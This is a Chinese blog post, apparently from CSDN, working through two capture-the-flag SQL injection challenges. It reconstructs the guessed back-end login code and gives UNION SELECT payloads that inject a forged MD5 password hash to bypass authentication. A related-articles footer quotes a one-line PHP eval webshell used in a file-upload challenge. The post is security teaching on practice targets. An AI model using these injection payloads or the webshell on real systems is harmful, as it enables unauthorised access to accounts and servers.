[GXYCTF2019]BabySQli 、[Jarvis-OJ-Web]Simple Injection猜测后端sql语句

最新推荐文章于 2024-03-03 12:02:10 发布
最新推荐文章于 2024-03-03 12:02:10 发布
阅读量627 收藏
点赞数
分类专栏: BUUCTF 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42812036/article/details/104416564
版权

[GXYCTF2019]BabySQli

后端判断语句猜测

<?php
$row;
$pass=$_POST['pw'];
if($row['username']==’admin’)
{ 
	if($row['password']==md5($pass))
	{ 
		echo $flag;
	}
	else{ 
		echo “wrong pass!”;
 	}
}else{ echo “wrong user!”;}

payload:

'union select 1,’admin’,202cb962ac59075b964b07152d234b70#

pass输入123’

[Jarvis-OJ-Web]Simple Injection

在这里插入图片描述

简单测试下,发现有密码错误和用户名错误两种错误回显。两道题的相同之处在此

页面存在两种报错返回结果,用户名错误和密码错误,而且输入除admin外的用户名均提示用户名错误,所以可以肯定admin一个用户,
进而猜测它的处理逻辑可能为:通过输入的username作为where条件查询密码,如果存在且查询结果与输入的密码相同即爆flag,如果不匹配则返回密码错误,而如果不存在查询结果就报用户名错误。逻辑代码类似于下面:

$res = query(select password from user where username=$_POST['username']);//query函数为了简便瞎写了
if($res)    //查询返回结果不为空集
{
    if(fetch($res)===md5($_POST['password'])){  //fetch函数为图简便,也是瞎写的。
        echo $flag;
    }
    else{   //密码不匹配
        echo "密码错误";
    }
}
else{
    echo "用户名错误";
}

于是我们可以输入一个不存在的用户名,结合union select语句手动创建一个密码作为sql查询语句的返回结果,然后密码框处输入我们创建的假密码进行绕过。
例如输入username=miracle778’//union(select(123))#&password=123,结果返回密码错误没有报用户名错误,这说明了我们这个方法是生效的,只是服务器做密码比较的时候可能用了哈希加密,这里推测用了md5加密。于是输入username=miracle778’//union(select(md5(‘123’)))#&password=123,成功得到flag

在这里插入图片描述

昂首下楼梯
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jarvis-backend-node:jarvis后端节点
05-24
Jarvis后端节点 协议的第一个节点实现。 快速安装 这是一个Beta版本,同时还包含一个Beta安装过程:只是看一下。 cd /tmp/ mkdir jarvis cd jarvis npm install git+...
一次线上ctf的日志分析(sql注入),网络协议分析,内存取证
weixin_50464560的博客
09-16 3855
拿到的是两个东西 我们先看secret.log 很多乱码但是有一串16进制数 把这段复制下来,我们放到HxD看 点击新建,直接粘贴 发现不对,观察头部,发现少了一个数(5) 因为加上5就是一个rar头部 即 导出来,改成ya.rar 要密码 我们看password.pcapng 输入过滤找post 有些很奇怪的东西 查询后知道这是jsfuck加密,具体看这里:https://blog.csdn.net/weixin_50464560/article/details/1203..
[GXYCTF2019]BabyUpload
weixin_43152809的博客
11-17 3383
打开界面是一个文件上传 尝试一下 首先上传的是php文件 但是显示 后缀名不能有ph! emmm,看来是对php文件做了限制 随后习惯性上传png 返回 上传类型也太露骨了吧! emmm,随后又尝试了.htaccess和.user.ini文件都与上方显示相同 正当我一筹莫展之际 发现了题目页面的网址 我突然觉得我有希望了! 随后果然发现了题目的源码 <?php session_start(); echo "<meta http-equiv=\"Content-Type\" conten
[GXYCTF2019]BabyUpload1 -- 题目分析与详解
最新发布
2302_79800344的博客
03-03 936
代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。.htaccess 文件。
CTF】[GXYCTF 2019]BabyUpload
西原一点红的博客
06-19 729
说明是黑名单,且对上传的类型也做了校验。说明对上传的内容也做了校验。4. 修改上传内容绕过校验。
[GXYCTF2019]BabySQli
pakho_C的博客
02-11 2372
web第29题 [GXYCTF2019]BabySQli 打开靶场: 源码: 一个简单的登录页面,首先直接尝试输入单引号’ 报错,那必然存在sql注入 永真式进行登录 得到这个页面,在源码中发现一个像是加密后的数据,在解码器中进行解码尝试 得到base32解码出来的文本很像base64加密后的数据,进行二次解码 果然有发现,给出了查询的语句,从user表中查询username为表单中提交的用户名的数据,应该就是页面回显的内容 永真式登录失败说明做了过滤,尝试双写绕过 依然失败 直接fuzz
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
02-05
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
Jarvis-Musical-Bot:Jarvis Telegram Music Bot for Spotify
04-06
Jarvis Telegram Music Bot for Spotify 该Telegram机器人允许用户授权其Spotify帐户并获得不错的功能。 授权实际上不收集用户昵称以外的任何私人数据。 其特点: 分享当前歌曲。 您可以共享Spotify客户端上当前...
Jarvis-wechatreminder:SpringBoot微信后端
05-26
贾维斯(Jarvis Wechatreminder) SpringBoot微信烘焙
jarvis-api:JARVIS系统的API部分
05-16
jarvis-api [WIP] JARVIS:只是一个非常智能的系统 该项目是JARVIS系统的API部分。 它是用于管理您的忙碌生活的各种插件的集合。 (将用于UI前端。) 安装 您将需要来运行服务器。 安装完成后,在项目文件夹中运行...
[GXYCTF2019]BabySQli1-BUUCTF
chinese_cabbage0的博客
02-05 555
主要是一个buuctf题目的解题过程,大家可以参考一下
BUUCTF--[GXYCTF2019]BabySQli详解
x1520700的博客
05-23 2569
题目预备知识 mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5,源码上用的是md5加密了密码 当没有回显字段时,只能猜测三个字段类型分别为id,username,password 1、经过题目名提示,猜测应该是SQL注入,进入题目,发现一个登录框功能板,确信应该就是SQL注入,开始注入; 这里分享一个小知识点: sql注入可能出现的功能点 登录页面,留言板,修改信息,获取http请求头(User-agent,referer,xff)等只要是和数据库存在交...
[GXYCTF 2019]BabySqli
m0_70819573的博客
03-23 311
2.此时可以利用sqli的特性,当查询一个不存在的表时会创建一个虚拟的表,且当查询原题源码时发现它会将pwMD5加密与库中数据比较,在sqli中,数据库密码一般以MD5加密或明文存放。过滤了(),database(),无法进行爆库,所以只能想是否存在admin用户,发现回显wrong pass.1.打开环境,显然是sql注入。
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞
weixin_44632787的博客
06-19 1815
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞(.htaccess) 早上遇到一个文件解析漏洞,下午又遇到一个。。。。好吧,看来文件解析漏洞在CTF中也是很重要的一个知识点!!! 首先启动挑战项目 先正常的上传一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 我经常用这样的一句话木马,为了防止php文件内容被过滤啥的… 所以,把传输的文件名改回1.pn
[GXYCTF2019]BabySQli 1
qq_43618536的博客
07-03 1128
BUUCTF的[GXYCTF2019]BabySQli 1
GXYCTF2019--BabySQli
Oavinci的博客
06-28 690
知识点: 查询数据不存在时,联合查询会构造一个虚拟的数据在数据库中。 随意输入点击登录,查看源代码得到一串字符串 base32+base64解码得到: select * from user where username = '$name' fuzz一下发现过滤了一些字符串。首先大写绕过"Order by 3#",查询列数为3,猜测为id,username,password。 这题考察的是用户名和密码分开检验,先将username对应的字段查出来后,再检验password和查出来的密码能不能
jarvisoj_level0
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值